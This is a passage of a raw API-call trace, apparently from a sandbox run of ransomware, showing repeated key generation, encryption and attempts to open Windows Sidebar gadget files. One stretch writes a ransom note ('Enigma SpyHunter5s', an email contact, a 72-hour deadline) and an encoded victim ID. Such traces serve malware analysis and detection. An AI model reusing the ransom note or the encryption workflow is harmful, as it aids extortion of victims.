hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e928 | out: pbBuffer=0x248e928) returned 1 [0160.985] GetProcessHeap () returned 0x2c0000 [0160.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.985] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e920*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e920*=0x30) returned 1 [0160.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_docked.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.991] GetProcessHeap () returned 0x2c0000 [0160.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.991] GetProcessHeap () returned 0x2c0000 [0160.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d818 | out: hHeap=0x2c0000) returned 1 [0160.991] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e920 | out: pbBuffer=0x248e920) returned 1 [0160.991] GetProcessHeap () returned 0x2c0000 [0160.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.991] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e918*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e918*=0x30) returned 1 [0160.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.995] GetProcessHeap () returned 0x2c0000 [0160.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.996] GetProcessHeap () returned 0x2c0000 [0160.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40d28 | out: hHeap=0x2c0000) returned 1 [0160.996] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e920 | out: pbBuffer=0x248e920) returned 1 [0160.996] GetProcessHeap () returned 0x2c0000 [0160.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.996] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e918*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e918*=0x30) returned 1 [0160.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.000] GetProcessHeap () returned 0x2c0000 [0161.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.000] GetProcessHeap () returned 0x2c0000 [0161.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb0fb8 | out: hHeap=0x2c0000) returned 1 [0161.000] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e918 | out: pbBuffer=0x248e918) returned 1 [0161.000] GetProcessHeap () returned 0x2c0000 [0161.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.001] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e910*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e910*=0x30) returned 1 [0161.001] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.013] GetProcessHeap () returned 0x2c0000 [0161.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.014] GetProcessHeap () returned 0x2c0000 [0161.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3bf90 | out: hHeap=0x2c0000) returned 1 [0161.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e918 | out: pbBuffer=0x248e918) returned 1 [0161.014] GetProcessHeap () returned 0x2c0000 [0161.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e910*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e910*=0x30) returned 1 [0161.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.014] GetProcessHeap () returned 0x2c0000 [0161.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.014] GetProcessHeap () returned 0x2c0000 [0161.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a948 | out: hHeap=0x2c0000) returned 1 [0161.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e910 | out: pbBuffer=0x248e910) returned 1 [0161.014] GetProcessHeap () returned 0x2c0000 [0161.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e908*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e908*=0x30) returned 1 [0161.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.014] GetProcessHeap () returned 0x2c0000 [0161.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.015] GetProcessHeap () returned 0x2c0000 [0161.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3bbb0 | out: hHeap=0x2c0000) returned 1 [0161.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.015] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.016] WriteFile (in: hFile=0x178, lpBuffer=0x248e843*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e96c, lpOverlapped=0x0 | out: lpBuffer=0x248e843*, lpNumberOfBytesWritten=0x248e96c*=0x127, lpOverlapped=0x0) returned 1 [0161.016] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.016] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e96c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e96c*=0x2ac, lpOverlapped=0x0) returned 1 [0161.016] CloseHandle (hObject=0x178) returned 1 [0161.017] GetProcessHeap () returned 0x2c0000 [0161.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89da0 | out: hHeap=0x2c0000) returned 1 [0161.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e908 | out: pbBuffer=0x248e908) returned 1 [0161.017] GetProcessHeap () returned 0x2c0000 [0161.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e900*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e900*=0x30) returned 1 [0161.017] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\css\\settings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.021] GetProcessHeap () returned 0x2c0000 [0161.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.021] GetProcessHeap () returned 0x2c0000 [0161.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb0cb8 | out: hHeap=0x2c0000) returned 1 [0161.021] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e908 | out: pbBuffer=0x248e908) returned 1 [0161.021] GetProcessHeap () returned 0x2c0000 [0161.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.021] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e900*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e900*=0x30) returned 1 [0161.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.049] GetProcessHeap () returned 0x2c0000 [0161.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.049] GetProcessHeap () returned 0x2c0000 [0161.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a858 | out: hHeap=0x2c0000) returned 1 [0161.049] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e900 | out: pbBuffer=0x248e900) returned 1 [0161.049] GetProcessHeap () returned 0x2c0000 [0161.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.049] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8f8*=0x30) returned 1 [0161.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.062] GetProcessHeap () returned 0x2c0000 [0161.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.063] GetProcessHeap () returned 0x2c0000 [0161.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89b90 | out: hHeap=0x2c0000) returned 1 [0161.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e900 | out: pbBuffer=0x248e900) returned 1 [0161.063] GetProcessHeap () returned 0x2c0000 [0161.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8f8*=0x30) returned 1 [0161.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.069] GetProcessHeap () returned 0x2c0000 [0161.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.069] GetProcessHeap () returned 0x2c0000 [0161.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb08b8 | out: hHeap=0x2c0000) returned 1 [0161.069] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8f8 | out: pbBuffer=0x248e8f8) returned 1 [0161.069] GetProcessHeap () returned 0x2c0000 [0161.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.069] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8f0*=0x30) returned 1 [0161.069] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\setting_back.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.072] GetProcessHeap () returned 0x2c0000 [0161.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.072] GetProcessHeap () returned 0x2c0000 [0161.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89560 | out: hHeap=0x2c0000) returned 1 [0161.073] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8f8 | out: pbBuffer=0x248e8f8) returned 1 [0161.073] GetProcessHeap () returned 0x2c0000 [0161.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.073] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8f0*=0x30) returned 1 [0161.073] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_disabled.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.102] GetProcessHeap () returned 0x2c0000 [0161.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.102] GetProcessHeap () returned 0x2c0000 [0161.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c831f8 | out: hHeap=0x2c0000) returned 1 [0161.103] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8f0 | out: pbBuffer=0x248e8f0) returned 1 [0161.103] GetProcessHeap () returned 0x2c0000 [0161.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.103] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8e8*=0x30) returned 1 [0161.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.247] GetProcessHeap () returned 0x2c0000 [0161.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.247] GetProcessHeap () returned 0x2c0000 [0161.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3d2a0 | out: hHeap=0x2c0000) returned 1 [0161.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8f0 | out: pbBuffer=0x248e8f0) returned 1 [0161.247] GetProcessHeap () returned 0x2c0000 [0161.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8e8*=0x30) returned 1 [0161.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_divider_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.258] GetProcessHeap () returned 0x2c0000 [0161.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.258] GetProcessHeap () returned 0x2c0000 [0161.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82e80 | out: hHeap=0x2c0000) returned 1 [0161.258] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8e8 | out: pbBuffer=0x248e8e8) returned 1 [0161.258] GetProcessHeap () returned 0x2c0000 [0161.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.258] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8e0*=0x30) returned 1 [0161.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_corner_top_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_corner_top_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.262] GetProcessHeap () returned 0x2c0000 [0161.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.262] GetProcessHeap () returned 0x2c0000 [0161.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82b08 | out: hHeap=0x2c0000) returned 1 [0161.262] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8e8 | out: pbBuffer=0x248e8e8) returned 1 [0161.262] GetProcessHeap () returned 0x2c0000 [0161.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.262] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8e0*=0x30) returned 1 [0161.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.265] GetProcessHeap () returned 0x2c0000 [0161.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.266] GetProcessHeap () returned 0x2c0000 [0161.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ce40 | out: hHeap=0x2c0000) returned 1 [0161.266] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8e0 | out: pbBuffer=0x248e8e0) returned 1 [0161.266] GetProcessHeap () returned 0x2c0000 [0161.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.266] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8d8*=0x30) returned 1 [0161.266] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_bottom.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.269] GetProcessHeap () returned 0x2c0000 [0161.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.269] GetProcessHeap () returned 0x2c0000 [0161.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7a58 | out: hHeap=0x2c0000) returned 1 [0161.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8e0 | out: pbBuffer=0x248e8e0) returned 1 [0161.270] GetProcessHeap () returned 0x2c0000 [0161.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.270] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8d8*=0x30) returned 1 [0161.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\glow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.273] GetProcessHeap () returned 0x2c0000 [0161.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.273] GetProcessHeap () returned 0x2c0000 [0161.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b9c0 | out: hHeap=0x2c0000) returned 1 [0161.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8d8 | out: pbBuffer=0x248e8d8) returned 1 [0161.273] GetProcessHeap () returned 0x2c0000 [0161.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8d0*=0x30) returned 1 [0161.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.278] GetProcessHeap () returned 0x2c0000 [0161.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.278] GetProcessHeap () returned 0x2c0000 [0161.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b7d0 | out: hHeap=0x2c0000) returned 1 [0161.278] CryptGenRandom (in: 